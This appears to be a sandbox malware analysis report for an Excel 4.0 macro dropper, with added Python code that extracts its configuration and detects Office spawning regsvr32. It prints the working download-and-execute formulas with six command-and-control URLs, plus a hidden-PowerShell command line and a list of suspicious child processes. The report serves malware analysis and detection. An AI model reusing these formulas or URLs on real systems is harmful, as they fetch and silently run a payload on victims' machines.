
General

  • Target

    af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5

  • Size

    48KB

  • Sample

    241111-13jyaswret

  • MD5

    ea630071369fb92e49d1a08a0f80698b

  • SHA1

    937216417a51e962cee42f5ba3863fb18f83f342

  • SHA256

    af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5

  • SHA512

    dce3ab19592942b5f719b4d60ec6928547e6b37f2319a76cc849e574399e62299e8d8e126726957413bf36db6d1c6cc4005d139c77424cdccb2a3dd8768fd51f

  • SSDEEP

    768:nO+CAEWvxRc3mlkKDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0AOBAa:n7O2b8QkKDNck01u/R2rZyjtBl

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://suleyera.com/components/CNGhltc5v2K6/

http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/

http://moveit.savvyint.com/config/DsfssbO7BYG/

https://schwizer.net/styled/D0MG/

http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/

http://shimal.atwebpages.com/wp-content/xkaRkHr/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://suleyera.com/components/CNGhltc5v2K6/","..\ax.ocx",0,0)
    =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/","..\ax.ocx",0,0))
    =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveit.savvyint.com/config/DsfssbO7BYG/","..\ax.ocx",0,0))
    =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://schwizer.net/styled/D0MG/","..\ax.ocx",0,0))
    =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/","..\ax.ocx",0,0))
    =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shimal.atwebpages.com/wp-content/xkaRkHr/","..\ax.ocx",0,0))
    =IF('LGGDGB'!E21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx")
    =RETURN()
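The formulas read as a download chain with fallbacks: the first URLDownloadToFileA call is unconditional, each later one is wrapped in IF('LGGDGB'!Exx<0, ...) so it only runs when the previous attempt left a negative (failed) result in the sheet, and whichever download succeeds ends up at ..\ax.ocx, which regsvr32.exe -s then loads. The following is an added example, not tria.ge's own config extractor, that turns formula text of this shape (for instance olevba or XLMMacroDeobfuscator output) into the same kind of config shown above: C2 list in fallback order, the guard cell for each URL, the drop path and the execution command. The regular expressions, the Download dataclass and the field names of the returned dict are my own choices; the input is the formula text from this page, embedded as a raw string.

```python
# Added example (not tria.ge code): config extraction from Excel 4.0 (XLM)
# dropper formulas of the CALL("urlmon","URLDownloadToFileA",...) / EXEC(...)
# pattern. Regexes, class and output field names are this example's own.
import json
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: the formulas listed on this page, one per line. A raw
# string keeps the backslashes in "..\ax.ocx" and the regsvr32 path literal.
FORMULAS = r"""
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://suleyera.com/components/CNGhltc5v2K6/","..\ax.ocx",0,0)
=IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/","..\ax.ocx",0,0))
=IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveit.savvyint.com/config/DsfssbO7BYG/","..\ax.ocx",0,0))
=IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://schwizer.net/styled/D0MG/","..\ax.ocx",0,0))
=IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/","..\ax.ocx",0,0))
=IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shimal.atwebpages.com/wp-content/xkaRkHr/","..\ax.ocx",0,0))
=IF('LGGDGB'!E21<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx")
=RETURN()
"""

# Optional guard IF('Sheet'!Cell<0, ...) followed by the urlmon download call.
# URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB): after the
# "JJCCBB" type string and pCaller come the URL and the destination path.
DOWNLOAD_RE = re.compile(
    r"(?:IF\('(?P<sheet>[^']+)'!(?P<cell>[A-Z]+\d+)<0,)?"
    r'CALL\("urlmon","URLDownloadToFileA","[A-Z]+",\d+,"(?P<url>[^"]+)","(?P<dest>[^"]+)"'
)
EXEC_RE = re.compile(r'EXEC\("(?P<cmd>[^"]+)"\)')


@dataclass(frozen=True)
class Download:
    url: str
    dest: str
    guard: Optional[str]  # "LGGDGB!E11": this URL is tried only if that cell is < 0


def extract_config(formulas: str) -> dict:
    """Parse XLM formula text into a config dict (C2s in fallback order, etc.)."""
    downloads = [
        Download(m["url"], m["dest"], f"{m['sheet']}!{m['cell']}" if m["sheet"] else None)
        for m in DOWNLOAD_RE.finditer(formulas)
    ]
    execs = [m["cmd"] for m in EXEC_RE.finditer(formulas)]
    drop_paths = sorted({d.dest for d in downloads})
    return {
        "c2": [d.url for d in downloads],
        "fallback_guards": [d.guard for d in downloads],
        "drop_paths": drop_paths,
        "exec": execs,
        # Sanity check: the executed command must reference a dropped file;
        # if it does not, the chain was mis-parsed or is more obfuscated than this.
        "exec_uses_dropped_file": any(p in c for c in execs for p in drop_paths),
    }


def page_config() -> dict:
    """Config for the formulas shown on this page."""
    return extract_config(FORMULAS)


if __name__ == "__main__":
    print(json.dumps(page_config(), indent=2))
```

The regex deliberately does not match the IF('LGGDGB'!E21<0,CLOSE(0),) line, which is the "all downloads failed, close the workbook" branch rather than a download, so the six C2 URLs come out in the order the macro tries them.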

Extracted

Language
xlm4.0

Source          URLs
xlm40.dropper   http://suleyera.com/components/CNGhltc5v2K6/
xlm40.dropper   http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/

Targets

    • Target

      af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro. In this sample the extracted XLM macro's =EXEC() formula has Excel launch regsvr32.exe with the silent flag against the downloaded ..\ax.ocx.
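The same parent/child relationship is what an endpoint detection would key on. Below is an added example of that check, not tria.ge's signature logic, run over constructed process-creation events: the event field names (parent_image, image, command_line) are an assumption loosely modelled on Sysmon Event ID 1, the Office-parent and suspicious-child sets are my own, and the sample events (paths, command lines, the encoded PowerShell argument) are constructed for the example. It goes slightly beyond the page by also flagging the two regsvr32 traits seen in the macro, the silent flag and a relative module path.

```python
# Added example (not tria.ge code): "Office spawned an unexpected child"
# detection over constructed process-creation events. Field names, the
# process lists and the sample events are this example's own assumptions.
import ntpath
from dataclasses import dataclass

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Children Office has no business launching: regsvr32/rundll32 are the usual
# XLM-dropper loaders, the rest are script hosts and download helpers.
SUSPICIOUS_CHILDREN = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                       "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}


@dataclass(frozen=True)
class ProcessCreate:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the new process image
    command_line: str   # command line of the new process


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def check(evt: ProcessCreate) -> list[str]:
    """Return the reasons this event is suspicious; an empty list means no alert."""
    reasons: list[str] = []
    parent, child = _basename(evt.parent_image), _basename(evt.image)
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"office child: {parent} -> {child}")
        if child == "regsvr32.exe":
            # Plain whitespace split is enough for these samples; quoted paths
            # with spaces would need a real Windows argv splitter.
            args = evt.command_line.split()[1:]
            flags = [a.lower() for a in args if a.startswith(("-", "/"))]
            modules = [a for a in args if not a.startswith(("-", "/"))]
            # -s / /s suppresses the DllRegisterServer message box.
            if "-s" in flags or "/s" in flags:
                reasons.append("regsvr32 silent flag")
            # A module given by relative path (..\ax.ocx) is a dropped file,
            # not a registered component under Program Files or System32.
            if any(not ntpath.isabs(m) for m in modules):
                reasons.append("regsvr32 loads module from relative path")
    return reasons


def flagged(events: list[ProcessCreate]) -> list[tuple[ProcessCreate, list[str]]]:
    """Events that produced at least one reason, with their reasons."""
    return [(e, check(e)) for e in events if check(e)]


# Constructed events: the first mirrors the EXEC() formula from this sample,
# the others are benign or non-Office controls and one scripted-download case.
SAMPLE_EVENTS = [
    ProcessCreate(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                  r"C:\Windows\SysWOW64\regsvr32.exe",
                  r"C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx"),
    ProcessCreate(r"C:\Windows\explorer.exe",
                  r"C:\Windows\System32\regsvr32.exe",
                  r"regsvr32.exe /s C:\Program Files\Vendor\ctl.dll"),
    ProcessCreate(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                  r"C:\Windows\splwow64.exe",
                  r"C:\Windows\splwow64.exe 12288"),
    ProcessCreate(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
                  r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  r"powershell.exe -nop -w hidden -enc AAAA"),
]

if __name__ == "__main__":
    for evt, reasons in flagged(SAMPLE_EVENTS):
        print(_basename(evt.parent_image), "->", evt.command_line, "|", "; ".join(reasons))
```

The base rule (Office parent, loader or script-host child) is what fires on this sample; the two regsvr32-specific reasons are there to raise the score rather than to gate the alert, since legitimate regsvr32 use from Office is rare enough to be worth a look on its own.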
